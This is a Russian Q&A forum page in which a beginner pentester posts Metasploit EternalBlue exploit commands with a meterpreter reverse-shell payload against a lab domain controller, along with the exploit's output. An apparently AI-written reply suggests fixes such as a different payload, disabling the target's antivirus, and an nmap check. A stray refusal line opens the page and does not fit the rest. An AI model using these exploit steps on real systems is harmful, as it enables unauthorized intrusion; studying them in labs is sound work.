Извините, но я не могу помочь с этим.

Здравствуйте! Я начинающий пентестер и хотел бы задать вопрос. У меня есть Windows Server 2016 Standard (версия 14393), который является доменным контроллером с именем kuku.wsr. Используя EternalBlue, я обнаружил, что сервер уязвим. Я попытался подключиться к серверу через Metasploit с помощью следующих команд:

```
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp (или bind_tcp, оба варианта не работают)
set LHOST 192.168.115.132
set RHOST 192.168.115.128
exploit
```

Однако при выполнении команды `exploit` я получаю следующую ошибку:

```
[*] 192.168.115.128:445 - Connecting to target for exploitation.
[+] 192.168.115.128:445 - Connection established for exploitation.
[+] 192.168.115.128:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.115.128:445 - CORE raw buffer dump (45 bytes)
[*] 192.168.115.128:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.115.128:445 - 0x00000010  30 31 36 20 53 74 61 6e 64 61 72 64 20 45 76 61  016 Standard Eva
[*] 192.168.115.128:445 - 0x00000020  6c 75 61 74 69 6f 6e 20 31 34 33 39 33           luation 14393
[+] 192.168.115.128:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.115.128:445 - Trying exploit with 22 Groom Allocations.
[*] 192.168.115.128:445 - Sending all but last fragment of exploit packet
[*] 192.168.115.128:445 - Starting non-paged pool grooming
[+] 192.168.115.128:445 - Sending SMBv2 buffers
[+] 192.168.115.128:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.115.128:445 - Sending final SMBv2 buffers.
[*] 192.168.115.12
```

Не могли бы вы помочь разобраться в причине возникновения этой проблемы?
  • 4 апреля 2025 г. 19:25
Ответы на вопрос 4
Проблемы с использованием эксплойта EternalBlue в Metasploit могут возникать по разным причинам. Давайте рассмотрим несколько возможных причин и решений:

1. **Настройки брандмауэра**: Убедитесь, что на целевом сервере (192.168.115.128) не работает брандмауэр (или хотя бы порт 445 открыт). Вы можете временно отключить брандмауэр и повторить попытку.

2. **Антивирусное ПО**: Если на целевом сервере установлено антивирусное ПО, оно может блокировать попытки эксплуатации. Убедитесь, что антивирусное ПО отключено.

3. **Настройки Metasploit**:
   - Убедитесь, что вы используете последнюю версию Metasploit и что все модули обновлены. Команда `msfupdate` позволит вам получить обновления.
   - Попробуйте изменить тип полезной нагрузки (*payload*). Например, используйте `windows/x64/meterpreter/reverse_http`, если у вас проблемы с TCP.

4. **Проблемы с сетевым соединением**: Проверьте, можете ли вы получить доступ к целевому серверу по протоколу SMB. Вы можете использовать команду `smbclient` для проверки:
   ```
   smbclient -L //192.168.115.128 -U username
   ```

5. **Проверка уязвимости**: Убедитесь, что сервер действительно уязвим к эксплойту MS17-010. Вы можете проверить это с помощью `nmap`:
   ```
   nmap -p 445 --script smb-vuln-ms17-010 192.168.115.128
   ```

6. **Корректные IP-адреса**: Убедитесь, что вы правильно указали адреса в `LHOST` и `RHOST`. `LHOST` должен быть вашим IP-адресом в той же подсети, что и целевой сервер.

Если вы попробовали все эти шаги, но все еще получаете ошибки, более детальная информация об ошибке может помочь в диагностике.

Напоминаю, что использование подобного программного обеспечения должно проводиться только в рамках законных действий и только с разрешения владельца системы.
лет 30 назад предлагали стать раком и со всей дури в стену разогнаться, в ВДВ это называлось - бегущий лось
Если нужна ещё доп информация, напишите пожалуйста
я недопентестер
kali linux
ну вот сразу всё и ясно, вопрос к удалению
Похожие вопросы